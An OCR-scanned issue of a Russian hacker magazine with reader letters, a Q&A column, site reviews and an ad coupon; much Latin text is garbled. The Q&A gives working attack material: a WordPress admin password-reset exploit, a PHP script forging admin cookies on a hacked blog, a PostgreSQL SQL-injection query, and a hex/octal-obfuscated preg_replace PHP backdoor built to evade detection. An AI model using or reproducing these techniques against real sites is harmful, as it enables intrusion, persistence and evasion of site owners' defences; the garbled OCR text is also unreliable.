очень признательны Вам сравнялась со мной. Что я мог бы обещать взамен? Давайте говорить о том, 
чтобы сделать Юхороших вещей в этом месяце, что может сделать мир немного лучше ... 
[/доодіеіхапзіаію] 

Спасибо за ваше время, поздравление от Вилнюс, можите отвечат па Руский, Тотаз 



ПРИВЕТ, ТОМАС! 

Поскольку Володарский вежливо 
отказался перевести для наствое со- 
общение, а также с целью приведения 
английской и русской части письма 
к единообразному стилю изложения, 
мы решили воспользоваться услугами 
доодіе Ітапзіаію. Итак, вот что мы 
имеем тебе сказать по результатам 
прочтения данного перевода. 
Во-первых, спасибо за письмо — мы 
тоже вспомнили литовскую версиюЗЕ 
и с большим удовольствием пере- 
читали наши статьи, переведенные 
на литовский язык. Мы никогда и не 
думали, что написанные нами тексты 
могут выглядеть столь прикольно (без 
обид :]). Ваша версия журнала была 
потоньше, статей в ней — поменьше, 
но все же это был наш, родной □Е. На- 
счеттвоей просьбы — сходу ответить 
трудно, посмотрим в анналах. Кроме 
того, это письмо будет о публикован о в 
журнале, поэтому, может быть, нужный 
человектебя сам и найдет. Удачи! 



САМОЕ ДУРАЦКОЕ 
ПИСЬМО НОМЕРА 



ОТ: 123123 с 1 .к@ІІ 5 І.ги <а[ех-ги5ЙІіѵе.ги> 

ТЕМА: п/а 

а на счёттой х**ни со статьями уж извини, деньги нужны были очень , 
поэтому повторялся, теперь понял что вас нена***еш , ... реально 
прошу извененй 



Письмо, форварднутое мне пожелавшим остаться неизвестным 
редактором, порадовало. Знакомая ситуация, особенно было кру- 
то, когда автор пытался сдать Горлу статью, написанную самим же 










Горлумом пару-тройков месяцами ранее. Ну, так прямо и сделал — 
слил его статью с сайта, особо не разбирался, изменил имя автора 






и сдал все это хозяйство многострадальному редактору. Круче 
было только тогда, когда студенты сдали мне истории болезни по 
моим же больным (какаспирант кафедры, я иногда должен вести 
студентов], которые не имели с реальными больными ничего 
общего. Ну, лечил я больную от воспаления легких — а мне студент 










с честными глазами предъявляет под эту фамилию скачанный из 
инета «передне-распространенный инфаркт миокарда». 
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0: Что новенького из уязвимостей в МогсІРгезз 
появилось в последнее время? 

А: Недавно некий І_аигепІ ОаШе обнаружил в 
последней (на данный момент) версии 2.8.3 
сабжевого движка для создания блогов заме- 
чательный баг, позволяющий без каких-либо 
подтверждений сбросить парольадмина. Если 
ты внимательно читал мои этюды про вордпресс 
в предыдущих номерах журнала, то, наверняка, 
должен помнить о подобном баге в ѴѴогсІРгезз 
<= 2.6.1 . Тогда (впрочем, как и сейчас) баг поз- 
волял скинуть парольадмина при включенной 
регистрации на блоге и хитрых манипуляцях 
с обрезанием пробелов в мускуле. Сейчасже 
все гораздо проще — регистрация не нужна, 
но новый пароль, как и прежде, узнаеттолько 
законный владелец админского мыла. Для 
эксплуатации бага тебе всего лишь необходимо 
пройти по ссылке вида ШрУ/РОМАІЫ ЫАМЕ. 
ТЕР/уѵр-[одіп.рбр?асЦоп=гр&кеѵП= . При этом 
парольуспешно сбросится :). Работаетфишка 
только в 2.8.x ветке и проявляется в следующем 
коде вѵѵр-Іодіп.рЬр: 

бипсбіоп гезеб_раззтлгогс1 ( $кеу ) { 
дІоЬаІ $ѵ\грсПэ; 

$кеу = ргед_гер1асе ( 

' / [ А а-г0-9] /і ' , ' $кеу) ; 
іб ( ешрку ( $кеу ) ) 

гебигп петлг Ѵ№_Еггог ( ' Іпѵа1іс1_ 
кеу ' , ( ' Іпѵаііб. кеу ' ) ) ; 

$изег = $ѵтрс1Ъ->де1і_гсж ( $ѵѵрс!Ь -> 



ргераге ( " ЗЕЬЕСТ * ЕЕОМ $мрбЪ 
-> изегз ШЕЕЕ изег_асбіѵабіоп_кеу = 
%з " , $кеу ) ) ; 

} 

Здесьфункция ргерагеО приводит наш 
массив $кеу к строковому типу, вследствие 
чего $кеу становится пустым и подходит 
абсолютнодля всехзаписей втаблице 
пользователей. Как видишь, для этой 
замечательной уязвимости можно написать 
массовый эксплойт, который превратит 
жизнь админов вордпрессовских блогов в 
хаос. Но, так как практической пользы от 
этого нехитрого действа для тебя не будет 
никакой, я не советую заниматься такими 
пакостями. 

Р.З. Подробное абѵізогу смотри по ссылке 

Ьир://раскеі:5і:огі7і5есигі1:ѵ.огд/0908-ехрІоіі:5/ 

уѵогбргезз-абтіпгезеЩхЕ 

0: Взломал блог на ѴѴогсіРгезз. Как бы мне теперь 
заполучить админские куки на случай, если мой 
шелл удалят? 

А: Механизм генерации кукисов в вордпрессе 
не из самых простых, но, немного покурив ис- 
ходники, можно составить небольшой скрипт, 
отвечающий за вывод этих самых пресловутых 
кукис на экран: 

<?ркр 

іпсіибе ' . /ѵф-іпс1ибез/ѵ\7р-зеббіпдз . 
рЬр ' ; 



//ищем секретный ключ из конфига и 
соль из базы 
бипсбіоп щэз ( ) 

{ 

дІоЬаІ $ѵф_бебаи1к_зесгек_кеу ; 

= $ѵ^р_бебаи1к_зесгеЦ_кеу; 

Іі (бебіпесЗ( ' ЗЕСКЕТ_КЕУ ' ) && 

! = ЗЕСКЕТ_КЕУ) 

$зесгеб_кеу = ЗЕСКЕТ_КЕУ; 
іб (бе1іпеб( 'АбТН-КЕУ ' ) && 

!= АбТН_КЕУ) 

$зесгеб_кеу = АІІТН_КЕУ; 
$за1б=деб_орбіоп ( ' анТ.Ь яа Ш 1 ) ; 
іб (ешрбу ( $за1б) ) 

$за1б = деб_орбіоп ( ' зесгеб 1 ) ; 
гебигп $зесгеб_кеу . $за1б ; 

} 

//функция генерирует авторизацион- 
ные кукисы 

бипсбіоп аис ( $и = ' абшіп ' ) 

{ 

дІоЬаІ $ѵтр_ѵегзіоп; 

$з = ( $ѵтр_ѵегзіоп ! = ' 2 . 5 ' ' ) ? 

'Г : ' ' ; 

$б = 2107184816; 
гебигп $и . ' I ' . $б . 1 I ' . Ьазбщ 
Ьшас ( ' шсі5 ' , $и. $з . $б ,Ьаз]т_ 

Ьшас ( 'шсі5 ' , $и. $з . $б ,щэз ( ) ) ) ; 

} 

//выводим на экран 

ргіпб АбТН_СООКІЕ . ' = ' . аис ( ) ; 

?> 



► 140 
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Код выведет для тебя годные в течение 10 лет 
куки пользователя абтіп. 

О: Нашел 5СІІ_-инъекцию в движке, который ис- 
пользует РозІдгеБСІІ-, но никак не могу получить 
доступ к базе ІггіогтаІіоп_5сНета. Не знаешь, в 
чем дело? 

А: Вероятней всего, тебе попалась старая 
версия РозІдгеССИ, в которой попросту не 
существовало Іп^огтаІіоп_5сЬета. Ксчас- 
тью, вто время было некоежалкое подобие 
этой базы под названием Р0_ТАВІ_Е5. Как 
следует из названия, отсюда мы сможем 
узнать только таблицы, но никак не колонки 
(их придется подбирать вручную]. Итак, 
исходя из того, что здесь названия таблиц 
хранятся в колонке ТАВІ_ЕЫАМЕ, можно 
составить примерный запрос для эксплуата- 
ции твоей скули: 

ЬДСр : / /тш. зіНе . сот/розНдге . 
р!ір?ісІ = -999 ипіоп зеІесН 
ТАВЬЕЫАМЕ , пиіі , пиіі , пиіі , пиіі Нгот 
РС_ТАВЬЕЗ ІітіР 1 оННзеН О— 

0: Хочу создать свой стартап, но нужна какая-ли- 
бо оригинальная идея. Отсюда вопрос: какие за- 
падные стартапы считаются самыми успешными 
в интернете? 

А: Если исходить из формата «Тор 1 0», то можно 
выделить следующие мегауспешные веб-стар- 
тапы последних нескольких лет: 

1. МуВрасе [ ЫірУ/ѵѵѵѵѵѵ.тѵзрасе.сопп ]. социаль- 
ная сеть, основана в июле 2003 года; 

2 . ѴоиТиЬе [ бир://ѵѵѵѵѵѵ.ѵоиІиЬе.сопп ]. видеохос- 
тинг, основан в феврале 2005 года; 

3. ЕасеЬоок ( ШрУ/ѵѵѵѵѵѵЗасеЬоок.сопп ]. соци- 
альная сеть, основана в феврале 2004 года; 

4 . ѴѴікіресІіа [ ЬирУ/ѵѵѵѵѵѵ.ѵѵікіресІіа.огд ]. ѵѵікі- 
ЬазесІ энциклопедия, январь 2001 ; 

5 . ВеЬо ( ЫірѴ/ѵѵѵѵѵѵ.ЬеЬо.сопп ). социальная 
сеть, январь 2005 года; 

6 . Оідд ( Шр://ѵѵѵѵѵѵ.сІідд.сопп ]. социальная сеть 
новостей, ноябрь 2004 года; 

7 . ЕІіскгі ЫірѴ/ѵѵѵѵѵѵТІіскг.сопп ). фотохостинг. 
февраль2004; 

8. ЫеІѵіЬез [ ЬирУ/ѵѵѵѵѵѵ.пеІѵіЬез.сот ]. твоя 
стартовая страница интернета, сентябрь 2005; 

9 . ОеЫсіо.из ( ШрУ/сІеІ-ісіо.из ). социальные 
закладки, конец 2003 года; 

10 . МееЬо [ ЫірУ/ѵѵѵѵѵѵ.тееЬо.сог ], онлайн- 
мессенджер, сентябрь 2005 года. 

Как видно из вышеприведенного списка, все 
самые лакомые идеи из его начала уже заняты 
русскими стартаперами. Конецже списка впол- 
не свободен для рунета. Так что, действуй :]. 

0: Сделал карту ѴІ5А на сервисе Ераззрогіе. 



сот. Всем доволен, кроме мизерного лимита на 
снятие денег в банкоматах — 320 баксов в день. 
Как поднять этот лимит? 

А: Если ты не хочешь пользоваться мудреными 
инструкциями поувеличению лимитов самого 
епасса (пункт меню «Іпсгеазеуоиг ІітТз» в 
админке], то советую воспользоваться серви- 
сом еРауСегѵісе ( ШрУАл/ѵѵѵѵ.ераѵзегѵісе.ги ]. 
который предлагаетсвоим клиентам получить 
карту Ѵіза Еіесігоп еРаззрогІе с изначально 
установленным дневным лимитом на снятие 
наличности до $25.000. 

Для открытия счета в еРаззрогІе с помощью 
сайта необходимо, чтобы на твоем счету в 
ЕРСВапкіпдОпІіпе находилась сумма не 
менее$50($10 уже будет у тебя на кар- 
те]. Стоимость открытия счета зависит от 
дневного лимита на снятие наличности по 
карте еРаззрогІе и может составлять от $50 
до $300 в зависимости от дневного лимита 
($520-$25.050]. Сроки изготовления карты 
— 10-14 рабочих дней; сроки доставки: 
курьерской почтой (+$100] 3-4 рабочихдня, 
обычной почтой — около 3-х недель. 

О: Подскажи, каким образом можно надежней 
всего оставить свой бэкдор на сайте, движок 
которого написан на рМр? Способ с еѵаІ(Ьазе64_ 
сІесосІеО) уже очень хорошо палится. 

А: Действительно, найти злонамеренный код, 
вызываемый через функцию еѵа I, в своих 
скриптах проще простого (например, можно 
использовать всеми любимый дгер еѵаі ./*]. 
Поэтому пытливыеумы хакеров придумывают 
все новые и новые способы хитрого инжекта 
бэкдоров в рбр-скрипты. 

Итак, сначала немного теории. Какты, навер- 
няка, уже знаешь, замечательная функция 
ргед_герІасе() позволяет выполнять любой код 
с помощью модификатора «е»: 

<?рЪр 

ргед_гер1асе ( ' @ ( . + ) @ 

іе ' , " \ \ 1 " , 1 рЬріпНо ();'); 

?> 

Эта нехитрая регулярка вполнеуспешно 
выведет на твой экран результат выполнения 
функции рбріпіюО. Теперьзададимся вопросом: 
почему бы нам не сконструировать свой бэкдор 
с помощью ргед_гер1асе(]7 Сделать это можно, 
например, так: 

<?рЪр 

ргед_гер1асе ( 1 @ ( . + ) @іе ' , 

' еѵаі 1" \\1 " ) ; ' , 

' $_КЕ01ІЕЗТ[ст<і] ' ) ; 

?> 



Код будет выполнять любую рбр- конструкцию, 
переданную в скрипте помощью параметра 
стсЕ Кпримеру, такты сможешь вывести на 
экран рбріпІюО: 

ІіННр : / /зіНе . сот/ЬасксІоог . рЬр? 

стсЩрІіріпНо ( ) ; 

В этом способе все хорошо, крометого, что он 
замечательно палится из-за наличия модифи- 
катора «е» и вызова еѵаі. Конечно, можно это 
дело замаскировать с помощьютого же Ьазе64, 
но полученный код все еще будет очень подоз- 
рительным и крайне легким для расшифровки. 
Здесь нельзя не вспомнить особенность рбр, 
которая заключается в том, что шестнадцате- 
ричные (Ьех] и восьмеричные (осі] символы 
можно использовать в качестве параметров 
функции и просто в качестве альтернативного 
способа написания любых строк (использовать 
эти символы необходимо в двойных кавычках]. 
Привожу пример функции, которая закодирует 
любую строку в нужное нам представление 
(причем, Ьех и осі будут чередоваться для 
усложнения дешифровки строки]: 

ПипсСіоп зСг21іехосЩ ( $зСг) 

{ 

$зСг2Ь.ех = игісіесосіе ( $зСг ) ; 

$геСигпзСг= 1 1 ; 

Ног ( $і=0 ; $і<зСг1еп ( $зСг ) ; $і++ ) 

{ 

$1іех=с1ес1іех (огсі ( $зНг [$і] ) ) ; 

іН($і % 2 != 0) 

{ 

$Ьех=Ьазе_сопѵегН ( 

$Ьех, 16 , 8) ; 

$геНигпзНг .= " \\$Ьех" ; 

} 

еізе 

$геНигпзНг .= " \\x$]теx ,, ; 

} 

геНигп $геНигпзНг; 

} 

Теперьзаюзаем эту функцию для шифров- 
ки вышеприведенных аргументов функции 
ргед_гер1асе(): 

<?рЬр 

НипсНіоп зНг2]техосН ( $зНг ) 

{ 

} 
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$ту_сосІе = 1 ргед_гер1асе ( " ' . 
зСг2ЬехосЦ ( 1 @ ( . + ) @іе зД 

г21гехосЦ ( ' еѵаі ( " \ \1 " ) ; ' ) . 1 " , " 7 . 
зСг2ЪехосЦ ( 1 $_КЕ(УиЕ8Т [стсі] ' ) . ' " ) ; 1 ; 
ргіпЕ $ту_сос1е; 

?> 

После выполнения скрипт выведет на экран 
следующее значение, которое вполнеуспешно 
можно юзать для бэкдоров без всяких еѵаі и 
Ьазе64: 

ргед_гер1асе ( " \х40\50\х2е\53\ 
х29\100\х69\145 " , "\хб5\166\ 
хб1\154\х28\42 \х5с\61\х22 \51\хЗЬ" , 

" \х24\137\х52\105\х51\125\х45\123 \ 
х54\133 \хбЗ \155\хб4\135" ) ; 

Каквидишь, теперь всеаргументы нашей функ- 
ции зашифрованы в бех и осі представлении. 
Кстати, свою работоспособность от этого она не 
потеряла и все также выполнит для тебя любой 
рбр-код через переданный скрипту параметр 
стб :] 

О: Слышал о создании нейронной сети по распоз- 
наванию капчи на ^ѵабсгірі. Где можно узнать 
об этом поподробней? 

А: Действительно, некий Збаип Ргіебіе 
написал на обычном іаѵазсгірі: ОСН-модуль 
для распознавания сарісба на сервисе 
тедаиріоасі.сот . Модуль представляет собой 
искусственную нейронную сеть для работы с 
картинками с помощью НТМБ5]з-функции 
деИтадейаЮ Посмотреть пример работы и 
прочитатьтехнические детали можно здесь: 
ШрУ/бегесотеіЬеІігагбз.со.ик/ппи сарісба . 
а исходный код скрипта находится по адресу 
ШрУ/изегзсгірЮогд/зсгіріз/геѵіеѵѵ/ЗбУЗб . 

О: Есть необходимостьтранслировать видео (на- 
пример, с веб-камеры) в инет. В распоряжении 
есть сервер. Как лучше это реализовать? 

А: На самом деле, вариантов множество. Если 
брать конкретные программные продукты 
для организации веб-трансляции, то советую 
взглянуть в сторону ѵѵеЬсатХР Рго [ Ы4р:// 
ѵѵѵѵѵѵ.ѵѵеЬсаппхр.сопп І. ѴІ_С [ ѵѵѵѵѵѵ.ѵібеоіап.огд/ 
ѴІС І и чрезвычайно мощного ѴѴоѵѵга Мебіа 
Зегѵег ( ШрУАл/ѵѵѵѵ.ѵѵоѵѵгаппебіа.сопп ). Можно 
также попробовать: Изегѵегі ЫірУ/ІІтред. 
огдЛізегѵег-бос.ЫтІ ]. сатзегѵ [ ШрУ/сзегѵ. 
зоигсеіогде.пеі і. ѵѵеЬсат -зегѵег [ бир:// 
ѵѵеЬсатзегѵегзоигсеІогде.пеі ]. 

Одним из самых практичных вариантов, по- 
жалуй, является трансляция видео через Ріазб- 
плеер — втаком случае с воспроизведением не 
будет проблем у большинства пользователей. 
Реализовать можно с помощью двух продук- 
тов: АбоЬе РІазб Мебіа Епсобег [ бНрУАл/ѵѵѵѵ. 
абоЬе.сот/ргобисІз/йазбппебіаепсобіпд ] и 
АбоЬе РМЗ ( бирУ/ѵѵѵѵѵѵ.абоЬе.сот/ргобисІз/ 
ЛазбтебіазегѵегЛіазбтебіаепсобег ). Тоже са- 
мое вполне реально организоватьс помощью 
опен-сорсного продукта Ребб [ ШрУ/озИазб. 



огд/гебб ]. Особенно приятно, что видео в этом 
случае можнотранслировать с нескольких 
камер одновременно. 

О: Я хочу транслировать в инет видео с моей 
веб-камеры. Как это сделать без собственного 
сервера? 

А: Самый простой вариант — за юзать специ- 
альные сервисы для организации трансляции. 
Такой функционал есть на тоігі. )гп . гіДиЬе.ги 
и ѵаіѵ.ги . Последний, кстати, пока мало нагру- 
жен и буквально летает. 

О: Слышал, есть некий китайский «офис» — пол- 
ный клон продукта от М5. Где найти? 

А: Да, сделать полный клон и дать возможность 
клиентам приобрести болеедешевый продукт 
— было главной задачей программистов 
ЕЮіТісе [ бИрТ/ѵѵѵѵѵѵ.еѵегтогезѵѵ.сот ). Проект 
разрабатывается 9 лет, написан на баѵа, есть 
версии для ѴѴіпбоѵѵз, Ыпих и ЗутЬіап 05. Име- 
ется бета-версия для работы в онлайне через 
браузер. 

0: Есть ли в ѴѴіпсіоѵѵб аналог команды ипагпе, 
чтобы быстро определить версию системы? Ато, 
бывает, получишь доступ к стб.ехе, а о принад- 
лежности хоста ктой или иной ОС приходится 
судить по косвенным признакам. 

АіТакая команда есть: ѵег. Например, на офис- 
ном компьютере «Геймленда» команда выдает: 

С : \изг>ѵег 

МісгозоНС Ѵ/іпсІохѵз ХР [Версия 
5.1.2600] 

Это означает, что в качестве операционки 
и с п о л ьзу етс я ѴѴ і п б оѵѵз X Р 

0: Я живу в провинции, где до сих пор инет тари- 
фицируется потрафику, а безлимитных тарифов 
по адекватным ценам нет. И все бы ничего, если 
бы не необходимость общаться с работодателем 
(я фрилансер) по Бкуре. Эта зараза жрет чертов- 
ски много трафика, даже если звонки непосредс- 
твенно не осуществляются. Ведь есть же аналог, 
но с меньшим потреблениемтрафика? 

А: Да, действительно: Зкуре может исполь- 
зовать часть полосы твоего канала в любое 
время, когда он запущен. Благодаря этому 
удается обеспечить связь на любых компьюте- 
рах, даже находящихся за ЫАТ. Увы: страдают 
те, у кого каждый мегабайт по-прежнему на 
счету. В качестве альтернативы можно попро- 
бовать ѴоІР-сервис іщюігтіеі- Клиент, конечно, 
серьезно проигрывает по удобству Зкуре, но 
зато отличается минимальным потреблением 
трафика и бесплатными звонками во многие 
страны, а в России — в Москву и Питер. 

0: Поставил СепЮБ, но обратиться к моим служ- 
бам 1.ВАР никто не может. Какэто исправить? 

А: Дело в том, что конфигурация ІрІаЫез в сис- 
темах СепЮЗ/ Реб На! / РНЕБ/ Ребога Ыпих не 
позволяет осуществить входящие соединения 



к службам ЮАР Нужно открыть порты ТОР #389 
и ТСР #636, добавив следующие строчки в/еіс/ 
зузсопбд/ірІаЫез: 

-А КН-ЕігемаІІ-1-ШРІЛ 1 -з 

192.168.1.0/24 -ш зСаСе --зСаСе ЫЕШ 

-р Сер --сІрогЦ 3 89 -б АССЕРТ 

-А КН-ЕігемаІІ-1-ШРІЛ 1 -з 

192 . 168 . 1 .0/24 -т зСаСе --зСаСе ЫЕМ 

-р Сер --(ірогС 63 6 -б АССЕРТ 

Затем необходимо обновление службы ірІаЫез 
командой «зегѵісе ірІаЫез геіоаб». После этого 
подключение будут приниматься ото всех ком- 
пьютеров из подсети 192.168.1.0/24. 

О: Есть несколько конфигов в ХМІ_, где все дан- 
ные написаны одной строкой. Подскажи, есть ли 
способ автоматически отформатировать файлы 
так, чтобы появились отступы в соответствии со 
вложенностью элементов? 

А: Чтобы превратить непонятную кашу в 
опрятный ХМБ-файл, можно воспользоваться 
готовым ХЗБ-п реобразованием: 

<хз1 : зСу1езЪ.ееС ѵегзіоп= "1.0" 
хтіпз : хз1 = "ЫгСр : / /шт. 
ѵ#3 . огд/1999/Х8Ь/ТгапзПогш>» 

<хз 1 : оиСрсШ теШюсЩ " хті " / > 

<хз 1 : рагат пате= " іпсІепЦ - іпсгетепС " 
зе1есС= " &ароз ; &ароз;" /> 

<хз1 : СетрІаСе таСс]т= " * " > 

<хз1 : рагат пате= " іпсІепЦ " 
зе1есС= " &ароз ; &#хА; &ароз ; " /> 

<хз1 : ѵаіие-оі: зе1есС= " $іпс!епЦ " /> 
<хз1 : сору> 

<хз1 : сору-оН зе1есС= " @* " /> 

<хз1 : арр1у-Цетр1аСез> 

<хз1 : міШі-рагат пате= " іпсІепЦ " 
зе1есС=" сопсаС ($іпс!е:гЩ, 
$іпсіепЦ-іпсгетепЦ ) "/> 

</хз1 : арр1у-Цетр1аСез> 

<хз1 : ѵа1ие-оП зе1есС= " $іпсіепЦ " /> 
</хз1 : сору> 

</хз1 : Цетр1аСе> 

<хз1 : СетрІаСе 

таСс]г= " соттепС ( ) Іргосеззіпд- 
іпзСгисЦіоп ( ) " > 

<хз1 : сору /> 

</хз1 : Сетр1а1іе> 

<!-- ИАШШС: іМз із сіапдегоиз . 
Напсііе тСЪ. саге --> 

<хз1 : СетрІаСе 

таСс]г= " СехС ( ) [погтаііге- 

зрасе ( . ) =&ароз ; &ароз ; ] " /> 

</хз1 : зСу1ез]тееЦ> 

Применить ХЗБ-п реобразование кХМБ-файлу 
можно с помощью утилиты хтізіагіеі: [ бНр:// 
хтізіагзоигееіогде.пеі: ) . ИИ 
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ПРОСЛУШКА ВСТРОЕННЫМ МИКРОФОНОМ 







I 





ІЛЧІТ5 



Шр://ѵшѵѵ2 




ВІЮМЕЫОТ 

ммѵѵ.ЬидтепоГсот 

Самая большая подстава со стороны сайта — попросить регистрацию 
для того, чтобы скачать какой-то файл или открыть статью. Изба вить тебя 
от нудного занятия по созданию никому ненужного аккаунта поможет 
сайт Вид МеІЧоС Оттебя требуется лишь передать ему ІІРІ_ назойливого 
ресурса, этот, если повезет, вернет несколько пар логин-пароль. База 
составляется такими же, как и ты, пользователями системы, и на текущий 
момент может действительно помочь на большинстве ресурсов. Кстати, 
для еще большего удобства я поставил себе специальный плагин для 
РігеЬх’а с этого же ресурса. 




5Ѵ5ІЫТЕКЫАІ.5ЫѴЕ 

[іѵе.зузіп^егпаіз.сот 

С помощью классных утилит Марка Руссиновича можно творить 

іес< ■ Реанимировать систему? Да! Отловить руткит? Возможно! Чего 
стоят одни только монитор изменений в реестре и файловой системе. 
Одна проблема -такое количество тулз сложно всегда иметь под рукой. 
Теперь можно не париться с поиском на своем жестком диске и не закачи- 
вать тулзы заново, каждый раз распаковывая их. Клюбой утилите всегда 
можно обратиться, набрав в браузере: гЦрТ/Ііѵе.зѵзіпІегпаІз.сот НАЗВА- 
НИЕ^ РОГРАМ МЫ. Бинарникза кэшируется и тут же за пустится. 




ятѵ 

ѵаіѵ.ги 

Онлайн-сервис для организации своего персонального телевидения 

Один из самых простых способов, сидя где-нибудь вдалеке от дома, 
организовать трансляцию красот со своей веб-камеры напрямую в Сеть. 
Все, что нужно — камера, браузер и более-менее шустрый инет. С другой 
стороны, никто не обязываеттебя вещать с веб-камеры и при желании 
можно устроить настоящий телека нал, транслируя смонтированные 
ролики. Создание телепрограммы, различных уровней доступа, живого 
общения со зрителями — все к твоим услугам. 




ВІЮ5РѴ 

Ьидзрѵ.пеі 

Если найти подходящий сплоит не получается, его можно попробовать 

И для этого, возможно, даже не придется искать баги. У боль- 
шинства открытых проектов система баг-трекинга,т.е. учета ошибок, находится 
в открытом доступе: каждый может добавить информацию о баге и прочитать 
существующиетикеты, гдепочерпнетполезнуюдля взлома инфу. ВидЗру — это 
очень интересный проект, который аггрегирует в одном месте информацию с 
огромного числа числа источников, предпочитая критическиеуязвимости. И 
самое главное — позволяет осуществлять по ней поиск. 
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"Минимальная сумма заказа -350 руб. 

I купан действителен при одном заказе. 

В акции не участвуют блюда, комбообеды 
и гпец-предложения, предлагаемые по особой цене. 



1/8 Жизни 



Если жизнь, как и пиццу, разделить на 8 частей, то мы увидим, что 1/8 часть 
человек тратит на еду. Чтобы ваша 1/8 жизни была такой же яркой и вкусной, 
как 1/8 нашей пиццы, вы можете воспользоваться этим купоном в любом 
ресторане Сбарро. 
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